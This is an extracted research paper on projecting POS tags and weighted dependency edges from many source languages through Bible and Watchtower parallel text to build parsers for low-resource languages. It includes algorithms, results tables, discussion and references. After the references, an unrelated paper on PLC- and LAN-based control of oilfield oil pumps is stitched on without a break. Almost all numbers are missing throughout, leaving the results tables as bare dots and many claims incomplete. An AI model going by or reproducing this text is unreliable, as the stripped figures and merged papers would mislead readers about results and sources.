https://bitbucket.org/lowlands/release figure : an outline of dependency annotation projection, voting, and decoding in our method, using two sources i (german) and j (croatian) and a target t (english). part represents the multi-parallel corpus preprocessing, while parts and relate to our projection method. the graphs are represented as adjacency matrices with column indices encoding dependency heads. we highlight how the weight of target edge (ut = was,vt = beginning) is computed from the two contributing sources. minished parsing quality. we introduce a heuristics-free projection algo- rithm. the key difference from most previous work is that we project the whole set of potential syn- tactic relations with associated weights—rather than binary dependency edges—from a large number of multiple sources. instead of decoding the best tree on the source side—or for a single source-target sen- tence pair—we project weights prior to decoding, only decoding the aggregated multi-source weight matrix after the individual projections are done. this means that we do not lose potentially relevant infor- mation, but rather project dense information about all candidate edges. . multi-source sentence graph we assume the existence of n source languages and a target language t. for each tuple of translations in our multi-parallel corpus, our algorithm projects syntactic annotations from the n source sentences to the target sentence. projection happens at the sentence-level, taking a tuple of n annotated sentences and an unannotated sentence as input. we formalize the projection step as label propagation in a graph structure where the words of the target and source sentences are vertices, while edges represent dependency edge candidates between words within a sentence (a parse), as well as similarity relations between words of sentences in different languages (word alignments). formally, a projection graph is a graph g = (v,e). all edges are weighted by the function we : e → r. the vertices can be decomposed into sets v = v ∪·· ·∪vn, where vi is the set of words in sentence i. we often need to identify the target sentence vt = v and the source sentences vs = v ∪·· ·∪vn sep- arately. edges between vs and vt are the result of word alignments. the alignment subgraph is the bi- partite graph a = (vs,vt,ea), i.e., the subgraph of g induced by all (alignment) edges, ea, connecting vs and vt. the subgraph induced by the set of vertices vi, written as g[vi], represents the dependency edge candidates between the words of the sentence i. in general these subgraphs are dense, i.e., they encode weight matrices of edge scores and not just the sin- gle best parse. for the source sentences, we assume that the weights are provided by a parser, while the weights for the syntactic relations of the target sen- tence are unknown. with the above definitions, the dependency pro- jection problem amounts to assigning weights to the edges of g[vt] by transferring the syntactic parse graphs g[v ], . . . ,g[vn] from the source languages through the alignments a. . part-of-speech projection our annotation projection for pos tagging is simi- lar to the one proposed by agić et al. ( ). the algorithm is presented in algorithm . we first in- troduce a conditional probability distribution p(l|v) algorithm : project pos tags data: a projection graph g = (vs ∪vt,e); a set of pos labels l; a function p(l|v) assigning probabilities to labels l for word vertices v. result: a labeling of vt p̃ ← empty probability table label ← empty label-to-vertex mapping for vt ∈ vt do for l ∈ l do p̃(l|vt) ← ∑ vs∈vs p(l|vs)wa(vs,vt) label(vt) ← arg maxl p̃(l|vt) return label algorithm : project dependencies data: a projection graph g = (vs ∪vt,e). result: a dependency tree covering the target vertices vt. if project from trees then for i= to n do g[vi] ← dmst(g[vi]) for (ut,vt) ∈ g[vt] do we(ut,vt) ←−∞ if (·,ut) or (·,vt) /∈ ea then continue we(ut,vt) ← n∑ i= max us,vs∈vi we(us,vs) wa(us,ut) wa(vs,vt) g[vt] ← normalize(g[vt]) return dmst(g[vt]) over pos tags l ∈ l for each vertex v in the graph. for all source vertices, the probability distributions are obtained by tagging the corresponding sentences in our multilingual corpus with pos taggers, assign- ing a probability of one to the best tag for each word, and zero for all other tags. for each target token, i.e., each vertex v, the projection works by gathering ev- idence for each tag from all source tokens aligned to v, weighted by the alignment score: p(l|vt) ∝ ∑ vs∈vs p(l|vs) wa(vs,vt) the projected tag for a target vertex vt is then arg maxl p(l|vt). when both the alignment weights and the source tag probabilities are in { , }, this reduces to a simple voting scheme that assigns the most frequent pos tag among the aligned words to each target word. . dependency projection while in pos projection, we project vertex labels, in dependency projection we project edge scores. our procedure for dependency annotation projection is given in algorithm . for each source language, we parse the corresponding side of our multi-parallel corpus using a dependency parser trained on the source language treebank. however, instead of de- coding to dependency trees, we extract the weights for all potential syntactic relations, importing them into g as edge weights. the parser we use in our experiments assigns scores we ∈ r to possible edges. since the ranges and values of these scores are dependent on the train- ing set size and the number of model updates, we standardize the scores to make them comparable across languages. standardization centers the scores around zero with a standard deviation of one by sub- tracting the mean and dividing by the standard devi- ation. we apply this normalization per sentence. scores are then projected from source edges to target edges via word alignments wa ∈ [ , ]. in- stead of voting among the incoming projections from multiple sources, we sum the projected edge scores. because alignments vary in quality, we scale the score of the projected source edge by the corre- sponding alignment probability. a target edge (ut,vt) ∈ g[vt] can originate from multiple source edges even from a single source sen- tence, due to m : n alignments. in such cases, we only project the source edge (us,vs) ∈ g[vi> ] with the maximum score, provided the words are aligned, i.e., (us,ut) and (vs,vt) ∈ ea. in the case of a single source sentence pair, the target edge scores are set as follows: we(ut,vt) ← max us,vs∈vi edge︷ ︸︸ ︷ we(us,vs) alignment︷ ︸︸ ︷ wa(us,ut)wa(vs,vt) we note the distinction between edge weights we and alignment weights wa. with multiple sources, the target edge scores we(ut,vt) are computed as a sum over the individual sources: n∑ i= max us,vs∈vi we(us,vs) wa(us,ut) wa(vs,vt) after projection we have a dense set of weighted edges in the target sentence representing possible syntactic relations. this structure is equivalent to the n × n edge matrix used in ordinary first-order graph-based dependency parsing. before decoding, the weights are softmax- normalized to form a distribution over each possible head decision. the normalization balances out the contributions of the individual head decisions; and in our development setup, we found that omitting this step resulted in a substantial (∼ %) decrease in parsing performance. we then follow mcdonald et al. ( ) in using directed maximum spanning tree (dmst) decoding to identify the best dependency tree in the matrix. we note that dmst decoding on summed projected weight matrices is similar to the idea of re-parsing with dmst decoding of the output on an ensemble of parsers (sagae and lavie, ), which we use as a baseline in our experiments. data . training and test sets we use source treebanks from the universal de- pendencies (ud) project, version . (nivre et al., ). they are harmonized in terms of pos tag inventory ( tags) and dependency annotation scheme. in our experiments, we use the canoni- cal data splits, and disregard lemmas, morphological features and alternative pos from all treebanks. out of the languages currently in ud . , we drop languages for which the treebank does not dis- tribute word forms (japanese), and languages for which we have no parallel unlabeled data (latin, ancient greek, old church slavonic, irish, gothic). languages with more than k tokens (in the train- ing data) are considered source languages, the re- maining smaller treebanks (estonian, greek, hun- garian, latin, romanian, tamil) are strictly consid- ered targets. this results in treebanks for training http://hdl.handle.net/ / - source taggers and parsers. we use two additional test sets: quechua and serbian. the first one does not entirely adhere to ud, but we provide a pos tagset mapping and a few modifications and include it as a test language to deepen the robustness assess- ment for our approach across language families. the serbian test set fully conforms to ud, as a fork of the closely related croatian ud dataset. this results in a total of target languages. . multi-parallel corpora we use two sources of massively parallel text. the first is the edinburgh bible corpus (ebc) collected by christodouloupoulos and steedman ( ) con- taining languages. ebc has either k or k sentences for each language, depending on whether they are made up of full bibles or just translations of the new testament, respectively. we also crawled and scraped the watchtower online library website to collect what we will refer to as the watchtower corpus (wtc). the data is from - and the final corpus contains languages with sentences in the range of k- k. while some ebc bibles are written in dated language, we do not make any modifications to the corpus if the language is also present in wtc. however, as basque is not repre- sented in wtc, we replace the basque bible from with a contemporary version from , to en- able the use of basque in the parsing experiments. ebc and wtc both consist of religious texts, but they are very different in terms of style and con- tent. if we examine table that shows the most frequent words per corpus, we observe that the en- glish bible—the king james version from — contains many old english verb forms (“hath”, “giveth”). in contrast, the english watchtower is written in contemporary english, both in terms of verb inflection (“does”, “says”) and vocabulary (“to- day”, “human”). wtc also deals with contempo- rary topics such as blood “transfusion” ( men- tions) and “computer” ( mentions). the other languages also show differences in terms of language modernity and dialectal difference between ebc and wtc. while each bible transla- tion has its individual history, watchtower transla- https://github.com/ffnlp/sethr http://wol.jw.org http://www.biblija.net/biblija.cgi?l=eu http://hdl.handle.net/ / - https://github.com/ffnlp/sethr http://wol.jw.org http://www.biblija.net/biblija.cgi?l=eu ebc: hath, saith, hast, spake, yea, cometh, iniquity, wilt, smote, shew, begat, doth, lo, hearken, thence, verily, neighbour, goeth, shewed, giveth, smite, didst, wherewith, knoweth, night wtc: bible, does, however, says, today, during, show, human, later, important, really, humans, meetings, personal, states, future, fact, relationship, result, at- tention, someone, century, attitude, article, different table : the most frequent words exclusive to the english bible or watchtower. tions are commissioned by the same publisher, fol- lowing established editorial criteria. thus, we not only expect watchtower to yield projected treebanks that are closer to contemporary language, but also more reliable alignments. we expect these proper- ties to make wtc a more suitable parallel corpus for our experiments and for bootstrapping treebanks for new languages. . preprocessing segmentation for the multi-parallel corpora, we apply naive sentence splitting using full-stops, ques- tion marks and exclamation points of the alphabets from our corpora. we have collected these trigger symbols from the corpora, provided that they ap- peared as individual tokens at the ends of lines, and belonged to the “punctuation, other” unicode cate- gory. after sentence splitting, we use naive whites- pace tokenization. we also remove short-vowel di- acritics from all corpora written in arabic script. we use the same sentence splitting and tokeniza- tion for ebc and wtc. this is done regardless of bibles being distributed in a verse-per-line format, which means verses can be split in more than one sentence. the average sentence length across lan- guages is . tokens in ebc and . in wtc. the ud treebank tokenization differs from the to- kenization used for the multi-parallel corpora. the ud dependency annotation is based on syntactic words, and the tokenization guidelines recommend, for example, splitting clitics from verbs, and undo- ing contractions (spanish “del” becomes “de el”). these tokens made up of several syntactic words are https://github.com/bplank/ multilingualtokenizer called multiword tokens in the ud convention, and are included in the treebanks but are not integrated in the dependency trees, i.e., only their forming subto- kens are assigned a syntactic head. in order to harmonize the tokenization, we eliminate subtokens from the dependency trees, and incorporate the orig- inal multiword tokens—which are more likely to be naive raw tokens—in the trees instead. for each multiword token, we provide it with pos and de- pendency label from the highest subtoken, namely the subtoken that is closest to root. for example, in the case of a verb and its clitics, the chosen subtoken is the verb, and the multiword token is interpreted as a verb. if there are more candidates, we select one through pos ranking. alignment we sentence- and word-align all lan- guage pairs in both our multi-parallel corpora. we use hunalign (varga et al., ) to perform con- servative sentence alignment. the selected sen- tence pairs then enter word alignment. here, we use two different aligners. the first one is ibm fastalign by dyer et al. ( ), where we adopt the setup of agić et al. ( ) who observe a ma- jor advantage in using reverse-mode alignment for pos projection ( - accuracy points absolute). in addition, we use the ibm aligner efmaral by östling ( ). the intuition behind using ibm is that ibm introduces a bias toward more closely related languages, and we confirm this intuition through our experiments. we modify both aligners so that they output the alignment probability for each aligned token pair. tagging and parsing the source-sides of the two multi-parallel corpora, ebc and wtc, are pos- tagged by taggers trained on the respective source languages, using tnt (brants, ). we parse the corpora using turboparser (martins et al., ). the parser is used in simple arc-factored mode with pruning. we alter it to output per-sentence arc http://universaldependencies.org/ format.html https://github.com/coastalcph/ ud-conversion-tools. parameters used: utf, bisent, cautious, realign. parameters used: d, o, v, r. also reverse mode, with default settings, see https:// github.com/robertostling/efmaral. parameters used: basic. https://github.com/bplank/multilingualtokenizer https://github.com/bplank/multilingualtokenizer http://universaldependencies.org/format.html http://universaldependencies.org/format.html https://github.com/coastalcph/ud-conversion-tools https://github.com/coastalcph/ud-conversion-tools https://github.com/robertostling/efmaral https://github.com/robertostling/efmaral weight matrices. experiments outline for each sentence in a target language corpus, we retrieve the aligned sentences in the source corpora. then, for each of these source-target sentence pairs, we project pos tags and dependency edge scores via word alignments, aggregating the contributions of individual sources. once all con- tributions are collected, we perform a per-token ma- jority vote on pos tags and dmst decoding on the summed edge scores. this results in a pos-tagged and dependency parsed target sentence ready to con- tribute in training a tagger and parser. we remove target language sentences that contain word tokens without pos labels. this may happen due to unaligned sentences and words. we then pro- ceed to train models. . setup each of the experiment steps involves a number of choices that we outline in this section. we also de- scribe the baseline systems and upper bounds. pos tagging below, we present results with pos taggers based on annotation projection with both ibm and ibm ; cf. table . we train tnt with de- fault settings on the projected annotations. note that we use the resulting pos taggers in our dependency parsing experiments in order not to have our parsers assume the existence of pos-annotated corpora. for a more extensive assessment, we refer to the work by agić et al. ( ) who report baseline and upper bounds. in contrast to their work, we consider two different alignment models and use the ud pos tagset ( tags), in contrast to the tags of petrov et al. ( ). this makes our pos tagging problem slightly more challenging, but our parsing models potentially benefit from the extended tagset. dependency parsing we use arc-factored tur- boparser for all parsing models, applying the same setup as in preprocessing. there are three sets of models: our systems, baselines, and upper bounds. our fork of turboparser is available from https:// github.com/andersjo/turboparser. for example, the aux vs. verb distinction from ud pos does not exist the tagset of petrov et al. ( ), and neither does noun vs. propn (proper noun). our systems are trained on the projected ebc and wtc texts, while the rest—except system: dca- proj (see below)—are trained on the (delexical- ized) source-language treebanks. to avoid a bias toward languages with big tree- banks and to make our experiments tractable, we randomly subsample all training sets to a maximum of k sentences. in the multi-source systems, this means a uniform sample from all sources up to k sentences. this means our comparison is fair, and that our systems do not have the advantage of more training data over our baselines. our systems we report on four different cross- lingual systems, alternating the use of word aligners (ibm , ibm ) and the structures we project, as they can be either (i) arc-factored weight matrices from the parser (graphs) or (ii) the single-best trees pro- vided by the parser after decoding (trees). see the if-clause in algorithm . we tune two parameters for these four systems us- ing english as development set, confidence estima- tion and normalization, and we report the best setups only. for the ibm -based systems, we use the word alignment probabilities in the arc projection, but we use unit votes in pos voting. the opposite yields the best ibm scores: binarizing the alignment scores in dependency projection, while weight-voting the pos tags. we also evaluated a number of different normalization techniques in projection, only to ar- rive at standardization and softmax as by far the best choices. baselines and upper bounds we compare our systems to three competitive baselines, as well as three informed upper bounds or oracles. first, we list our baselines. delex-ms: this is the multi-source direct delexicalized parser transfer baseline of mcdonald et al. ( ). dca-proj: this is the direct correspondence as- sumption (dca)-based approach to projection, i.e., the de facto standard for projecting dependencies. first introduced by hwa et al. ( ), it was recently elucidated by tiedemann ( ), whose implemen- tation we follow here. in contrast to our approach, referred to as multi-dir in the original paper. https://github.com/andersjo/turboparser https://github.com/andersjo/turboparser dca projects trees on a source-target sentence pair basis, relying on heuristics and spurious nodes or edges to maintain the tree structure. in the setup, we basically plug dca into our projection-voting pipeline instead of our own method. reparse: for this baseline, we parse a target sentence using multiple single-source delexicalized parsers. then, we collect the output trees in a graph, unit-voting the individual edge weights, and finally using dmst to compute the best dependency tree (sagae and lavie, ). now, we explain the three upper bounds: delex-sb: this result is using the best single- source delexicalized system for a given target lan- guage following mcdonald et al. ( ). we parse a target with multiple single-source delexicalized parsers, and select the best-performing one. self-train: for this result we parse the target- language ebc and wtc data, train parsers on the output predictions, and evaluate the resulting parsers on the evaluation data. note this result is available only for the source languages. also, note that while we refer to this as self-training, we do not concate- nate the ebc/wtc training data with the source treebank data. this upper bound tells us something about the usefulness of the parallel corpus texts. full: direct in-language supervision, only avail- able for the source languages. we train parsers on the source treebanks, and use them to parse the source test sets. evaluation all our datasets—projected, training, and test sets—contain only the following conll- x features: id, form, cpostag, and head. for simplicity, we do not predict dependency labels (deprel), and we only report unlabeled attach- ment scores (uas). the pos taggers are evaluated for accuracy. we use our ibm taggers for all the baselines and upper bounds. . results our average results are presented in figure , in- cluding broken down by language family, the lan- http://ilk.uvt.nl/conll/#dataformat languages baselines all sources targets ie non-ie delex-ms . ? . ? . ? . ? . † dca-proj . † . ? . ? . † . † reparse . ? . ? . ? . ? . ? our systems ibm graphs . ? . ? . ? . ? . ? trees . ? . ? . ? . ? . ? ibm graphs . † . ? . ? . † . † trees . † . ? . ? . † . ? upper bounds delex-sb . ? . ? . ? . ? . ? self-train — . ? — — — full — . ? — — — table : overview of the parsing experiment results for the languages in ebc ∩ wtc. we report the best av- erage uas score per system and language subset. ie: indo-european languages, †: ebc, ?: wtc. guages for which we had training data (sources) and those for which we only had test data (targets). we see that our systems are substantially bet- ter than both multi-source delexicalized transfer, dca, and reparsing based on delexicalized trans- fer models. focusing on our system results, we see that projection with ibm leads to better models than projection with ibm . we also note that our improvements are biggest with non-indo-european languages. our ibm -based parsers top the ones using ibm alignment by points uas on indo- european languages, while the difference amounts to almost points uas on non-indo-european lan- guages (cf. table ). this difference in scores ex- poses a systematic bias towards more closely related languages in work using even more advanced word alignment (tiedemann and agić, ). the detailed results using the watchtower corpus are listed in table , where we also list the pos tagging accuracies. note that these are not directly comparable to agić et al. ( ), since they use a more coarse-grained tagset, and the results listed here are using wtc. we list the detailed results with the bible corpus online. the tendencies are the same, but the results are slightly lower almost con- sistently across the board. finally, we observe that our results are also bet- ter than those that can be obtained using a predictive model to select the best source language for delexi- https://bitbucket.org/lowlands/release http://ilk.uvt.nl/conll/#dataformat https://bitbucket.org/lowlands/release pos multi-proj baselines upper bounds sources ibm ibm ibm : graphs trees ibm : graphs trees delex-ms dca-proj reparse delex-sb self-train full arabic . . . . . . . . . . pl . . bulgarian . . . . . . . . . . da . . croatian . . . . . . . . . . cs . . czech . . . . . . . . . . sl . . danish . . . . . . . . . . no . . dutch . . . . . . . . . . pt . . english . . . . . . . . . . no . . farsi . . . . . . . . . . ar . . finnish . . . . . . . . . . no . . french . . . . . . . . . . it . . german . . . . . . . . . . no . . hebrew . . . . . . . . . . id . . hindi . . . . . . . . . . fi . . indonesian . . . . . . . . . . he . . italian . . . . . . . . . . es . . norwegian . . . . . . . . . . da . . polish . . . . . . . . . . cs . . portuguese . . . . . . . . . . es . . slovene . . . . . . . . . . cs . . spanish . . . . . . . . . . it . . swedish . . . . . . . . . . no . . targets estonian . . . . . . . . . . no — — greek . . . . . . . . . . no — — hungarian . . . . . . . . . . fi — — quechua . . . . . . . . . . pl — — romanian . . . . . . . . . . id — — tamil . . . . . . . . . . hi — — averages all . . . . . . . . . . — — sources . . . . . . . . . . . . targets . . . . . . . . . . — — table : pos tagging accuracies and uas parsing scores for the models built using wtc data. the results are split for source and target languages. all baselines and upper bounds use ibm pos taggers, while our multi-proj systems use their respective ibm or ibm taggers. calized transfer (rosa and žabokrtský, ); and better than what can be obtained using an oracle (delex-sb) to select the source language. direct supervision (full) upper bound unsur- prisingly records the highest scores in the experi- ment, as it uses biased in-language and in-domain training data. we also experiment with learning curves for direct supervision, with a goal of estab- lishing the amount of manually annotated sentences needed to beat our cross-lingual systems. we find that for most languages this number falls within the range of - in-domain sentences. discussion function words in ud, a subset of function words—tags: adp, aux, conj, sconj, det, punct—have to be leaves in the dependency trees, unless, e.g., they participate in multiword expres- sions. our predictions show some violations of this constraint (less than % of all words with these pos), but this ratio is similar to the amount of vi- olations found in the test data. projectivity the ud treebanks are in general largely projective. our ud test languages have an average of % fully projective sentences. how- ever, with ibm for example, we only predict % of all sentences to be projective. regardless of the differences in uas, we observe a corpus effect in the difference of projectivity of the predictions between using ebc ( %) and wtc ( %). we attribute the higher level of projectivity of ebc-projected tree- banks to bible sentences being shorter. the least projective predictions are farsi ( %) and hindi ( %), for which we also obtain the low- est uass. this may be a consequence of our naive tokenization, yielding unreliable alignments. how- ever, projectivity correlates more with uas (ρ = . ) than with pos prediction accuracy (ρ = . ). dependency length we observe that the average edge length on ibm and wtc is of . , while for ebc it is . . the average gold edge length is . —which is significantly higher at p < . (stu- dent’s t-test). however, the variance in gold edge length is about . times the deviation of predicted edge length. in other words, gold edges are often longer and more far-reaching. this difference in- dicates our predictions have worse recall for longer dependencies such as subordinate clauses, while be- ing more accurate in local, phrasal contexts. pos errors unlike most previous work on cross- lingual dependency parsing, and following the no- table exception of mcdonald et al. ( ), we rely on pos predictions from cross-lingual transfer mod- els. one may hypothesize that there is a significant error propagation from erroneous pos projection. we observe, however, that about % of wrong pos predictions are nevertheless assigned the right syn- tactic head. we argue that the fairly uniform noise on the pos labels helps the parsers regularize over the pos-dependency relations. possible improvements we treat pos and syn- tactic dependencies as two separate annotation lay- ers and project them independently in our approach. moreover, we project edge scores for dependencies, in contrast to only the single-best source pos tags. johannsen et al. ( ) introduce an approach to joint projection of pos and dependencies, showing that exploiting the interactions between the two lay- ers yields even better cross-lingual parsers. their approach also accounts for transferring tag distribu- tions instead of single-best pos tags. all the parsers in our experiments are restricted to k training sentences. ebc and wtc texts offer up to k training instances per language. we observe limited benefits of going beyond our training set cap, indicating a more elaborate instance selection-based approach would be more beneficial than just adding more training data. in our dependency graph projection, we normal- ize the weights per sentence. for future develop- ment, we note that corpus-level normalization might achieve the same balancing effect while still preserv- ing possibly important language-specific signals re- garding structural disambiguations. ebc and wtc constitute a (hopefully small) sub- set of the publicly available multilingual parallel corpora. the outdated ebc texts can be replaced by newer ones, and the ebc itself replaced or aug- mented by other online sources of bible translations. other sources include the un declaration of human rights, translated to languages, and reposito- ries of movie subtitles, software localization files, and various other parallel resources, such as opus (tiedemann, ). our approach is language- independent and would benefit from extension to datasets beyond ebc and wtc. related work pos tagging while projection annotation of pos labels goes back to yarowsky’s seminal work, das and petrov ( ) recently renewed interest in this problem. das and petrov ( ) go beyond our ap- proach to pos annotation by combining annotation projection and unsupervised learning techniques, but they restrict themselves to indo-european lan- guages and a coarser tagset. li et al. ( ) intro- duce an approach that leverages potentially noisy, but sizeable pos tag dictionaries in the form of wik- tionaries for resource-rich languages. garrette et al. ( ) also consider the problem of learning pos taggers for truly low-resource languages, but sug- gest crowdsourcing such pos tag dictionaries. finally, agić et al. ( ) were the first to intro- duce the idea of learning models for more than a dozen truly low-resource languages in one go, and our contribution can be seen as a non-trivial exten- sion of theirs. parsing with the exception of zeman and resnik ( ), initial work on cross-lingual dependency parsing focused on annotation projection (hwa et al., ; spreyer et al., ). mcdonald et al. ( ) and søgaard ( ) simultaneously took up the idea of delexicalized transfer after zeman and resnik ( ), but more importantly, they also intro- duced the idea of multi-source cross-lingual transfer in the context of dependency parsing. mcdonald et al. ( ) were the first to combine annotation pro- jection and multi-source transfer, the approach taken in this paper. annotation projection has been explored in the context of cross-lingual dependency parsing since hwa et al. ( ). notable approaches include the http://www.ohchr.org/en/udhr/pages/ searchbylang.aspx http://opus.lingfil.uu.se/ http://www.ohchr.org/en/udhr/pages/searchbylang.aspx http://www.ohchr.org/en/udhr/pages/searchbylang.aspx http://opus.lingfil.uu.se/ soft projection of reliable dependencies by li et al. ( ), and the work of ma and xia ( ), who make use of the source-side distributions through a training objective function. tiedemann and agić ( ) provide a more de- tailed overview of model transfer and annotation projection, while introducing a competitive machine translation-based approach to synthesizing depen- dency treebanks. in their work, we note the ibm word alignments favor more closely related lan- guages, and that building machine translation sys- tems requires parallel data in quantities that far sur- pass ebc and wtc combined. the best results reported to date were presented by rasooli and collins ( ). they use the inter- section of languages represented in the google de- pendency treebanks project and the languages rep- resented in the europarl corpus. consequently, their approach—similar to all the other approaches listed in this section—is potentially biased toward closely related indo-european languages. conclusions we introduced a novel, yet simple and heuristics- free, method for inducing pos taggers and depen- dency parsers for truly low-resource languages. we only assume the availability of a translation of a set of documents that have been translated into many languages. the novelty of our dependency projec- tion method consists in projecting edge scores rather than edges, and specifically in projecting these anno- tations from multiple sources rather than from only one source. while we built models for more than a hundred languages during our experiments, we eval- uated our approach across languages for which we had test data. the results show that our approach is superior to commonly used transfer methods. acknowledgements we thank the editors and the anonymous reviewers for their valuable comments. this research is funded by the erc starting grant lowlands (# ). references željko agić, dirk hovy, and anders søgaard. . if all you have is a bit of the bible: learning pos tag- gers for truly low-resource languages. in acl. thorsten brants. . tnt: a statistical part-of- speech tagger. in anlp. christos christodouloupoulos and mark steedman. . a massively parallel corpus: the bible in languages. language resources and evaluation, ( ). dipanjan das and slav petrov. . unsupervised part- of-speech tagging with bilingual graph-based pro- jections. in acl. chris dyer, victor chahuneau, and noah a. smith. . a simple, fast, and effective reparameteriza- tion of ibm model . in acl. dan garrette, jason mielens, and jason baldridge. . real-world semi-supervised learning of pos- taggers for low-resource languages. in acl. rebecca hwa, philip resnik, amy weinberg, clara cabezas, and okan kolak. . bootstrapping parsers via syntactic projection across parallel texts. natural language engineering, ( ). anders johannsen, željko agić, and anders søgaard. . joint part-of-speech and dependency projec- tion from multiple sources. in acl. shen li, joão graça, and ben taskar. . wiki-ly supervised part-of-speech tagging. in emnlp. zhenghua li, min zhang, and wenliang chen. . soft cross-lingual syntax projection for dependency parsing. in coling. xuezhe ma and fei xia. . unsupervised depen- dency parsing with transferring distribution via par- allel guidance and entropy regularization. in acl. andré f. t. martins, miguel almeida, and noah a. smith. . turning on the turbo: fast third-order non-projective turbo parsers. in acl. ryan mcdonald, koby crammer, and fernando pereira. . online large-margin training of dependency parsers. in acl. ryan mcdonald, slav petrov, and keith hall. . multi-source transfer of delexicalized dependency parsers. in emnlp. ryan mcdonald, joakim nivre, yvonne quirmbach- brundage, yoav goldberg, dipanjan das, kuzman ganchev, keith hall, slav petrov, hao zhang, oscar täckström, claudia bedini, núria bertomeu castelló, and jungmee lee. . universal dependency an- notation for multilingual parsing. in acl. joakim nivre, željko agić, maria jesus aranzabe, masayuki asahara, aitziber atutxa, miguel balles- teros, john bauer, kepa bengoetxea, riyaz ah- mad bhat, cristina bosco, sam bowman, giuseppe g. a. celano, miriam connor, marie-catherine de marneffe, arantza diaz de ilarraza, kaja do- brovoljc, timothy dozat, tomaž erjavec, richárd farkas, jennifer foster, daniel galbraith, filip gin- ter, iakes goenaga, koldo gojenola, yoav gold- berg, berta gonzales, bruno guillaume, jan hajič, dag haug, radu ion, elena irimia, anders jo- hannsen, hiroshi kanayama, jenna kanerva, simon krek, veronika laippala, alessandro lenci, nikola ljubešić, teresa lynn, christopher manning, cătălina mărănduc, david mareček, héctor martı́nez alonso, jan mašek, yuji matsumoto, ryan mcdonald, anna missilä, verginica mititelu, yusuke miyao, simon- etta montemagni, shunsuke mori, hanna nurmi, petya osenova, lilja Øvrelid, elena pascual, marco passarotti, cenel-augusto perez, slav petrov, jussi piitulainen, barbara plank, martin popel, prokopis prokopidis, sampo pyysalo, loganathan ramasamy, rudolf rosa, shadi saleh, sebastian schuster, wolf- gang seeker, mojgan seraji, natalia silveira, maria simi, radu simionescu, katalin simkó, kiril simov, aaron smith, jan štěpánek, alane suhr, zsolt szántó, takaaki tanaka, reut tsarfaty, sumire uematsu, lar- raitz uria, viktor varga, veronika vincze, zdeněk žabokrtský, daniel zeman, and hanzhi zhu. . universal dependencies . . robert östling. . word order typology through multilingual word alignment. in acl. slav petrov, dipanjan das, and ryan mcdonald. . a universal part-of-speech tagset. in lrec. mohammad sadegh rasooli and michael collins. . density-driven cross-lingual transfer of depen- dency parsers. in emnlp. rudolf rosa and zdeněk žabokrtský. . klcpos : a language similarity measure for delexicalized parser transfer. in acl. kenji sagae and alon lavie. . parser combination by reparsing. in naacl. kathrin spreyer, lilja Øvrelid, and jonas kuhn. . training parsers on partial trees: a cross-language comparison. in lrec. anders søgaard. . data point selection for cross- language adaptation of dependency parsers. in acl. jörg tiedemann and željko agić. . synthetic tree- banking for cross-lingual dependency parsing. jour- nal of artificial intelligence research, . jörg tiedemann, željko agić, and joakim nivre. . treebank translation for cross-lingual parser induc- tion. in conll. jörg tiedemann. . parallel data, tools and inter- faces in opus. in lrec. jörg tiedemann. . rediscovering annotation pro- jection for cross-lingual parser induction. in col- ing. dániel varga, lászló németh, péter halácsy, andrás ko- rnai, viktor trón, and viktor nagy. . parallel corpora for medium density languages. in ranlp. david yarowsky, grace ngai, and richard wicentowski. . inducing multilingual text analysis tools via robust projection across aligned corpora. in naacl. daniel zeman and philip resnik. . cross-language parser adaptation between related languages. in ijcnlp workshop on nlp for less privileged lan- guages. (shengquan yang) research of virtual classroom’s collaborative mechanism based on petri net international conference on sensor network and computer engineering (icsnce ) research of distributed control system for oilfield oil pump based on plc and lan shengquan yang school of computer science and engineering xi'an technological university xi'an, china e-mail: xaitysq@ .com chen gong school of computer science and engineering xi'an technological university xi'an, china e-mail: @qq.com abstract—in order to change the current bad situation such as the high cost of manpower, the failure to deal with the fault in time and the low management efficiency, etc. in oilfield oil pump measure and control, this paper puts forward the research and development of oilfield oil pump distributed control system based on plc and lan. firstly this paper describes the operation principle of oil pump equipment and gives its network topology model. secondly it designs the system macro distributed structure framework with layers: pump layer, plc layer, ipc layer and rcc layer in detail. finally the paper discusses the design of the software system including the plc on-site field measure and control software subsystem, the ipc local session software subsystem and the rcc remote management software subsystem. keywords-oil pump; plc; lan; distributed control i. introduction oil pump is an important core production power equipment for oil pipeline of oilfield enterprises. the traditional oil pump adopts manual inspection or computer combined with gauges and instruments, and local single- point auxiliary measurement and control [ ]. most of the oil pumps are arranged in unhindered and wild mountains and are huge in number. the traditional way of measurement and control will inevitably cause the high cost of manpower and low management efficiency of the oil field enterprises, equipment oil transport failures often occur while the pump equipment can not work normally because maintenance personnel are far from the workplace of the malfunction and it can not be processed in time, which causes crude oil leaks or production stagnation. programmable logic controller (plc) is a microelectronic program control device which has strong anti-jamming performance and high stability and supports complex logic, data processing and network communication. industry personal computer (ipc) is a full-fledged computer that supports industrial production process control, data storage, graphic display, dynamic curve and other functions under harsh industrial environment [ ]. because the production site is extremely dispersed irregularly, usually away from the site management office. with the help of local area net (lan), we can transmit the control pictures of ipc in the oil pump field at the same time to the oil pump equipment operating engineer's office to achieve real-time view and control. the local oil pump can be unattended, and can be found immediately and promptly sent to the site if there is a fault alarm. therefore, the study adopts field plc, ipc and lan on local enterprise to achieve the local and remote joint measurement and control of multi oil pump. the local oil pump firstly can be controlled initially by autonomous operation, and the remote center can control the multi spot on the spot in real time. this is a distributed control structure which can achieve the advantages of highly centralized management and decentralized control. this is of great significance for the oil field enterprises which can make the global oil pipeline equipment run safely, facilitate the remote management operation, reduce the manpower cost and improve the operation efficiency. ii. operation principle of oil pump equipment figure . oil pump operating process diagram the oil delivery pump system is mainly composed of a mechanical base, an oil delivery main pump, an oil delivery backup pump, a switch two position valve, an analog regulating valve, a three way switcher, an accident buffer tank, a mechanical pipeline, a frequency converter and various sensors [ ]. its function is to filter, heat up, buffer the general organ imports crude oil the failure accident temporary cache tank the three-way switch the oil delivery main pump the oil delivery backup pump the external output oil pipeline the site crude oil depot the crude oil filter international conference on sensor network and computer engineering (icsnce ) and pressurized the crude mixture which is sent from the general authority (or the wellhead) through the pipeline, and then transport it to the site oil depot according to the suitable flow rate. its operation principle of oil transportation is shown in figure . first of all the crude oil mixture which sent by the general organ or the pumping unit, through the mechanical pipeline to the crude oil filter to filter out the granular impurities, such as soil, slag, and so on. then according to the set of oil transportation process, the three-way switch is sent to the main oil pump or the oil backup pump, and the crude oil is regulated to the appropriate outlet pressure through the oil pump, and then transported to the original oil depot through the external output oil pipeline. because the flow and pressure of the total mechanism fluctuate greatly, the system needs intelligent control through the algorithm to the main pump or the pump frequency converter, to ensure the constant pressure of external transmission. if the external transmission pressure is too small, the external distance will not have motive force to run. 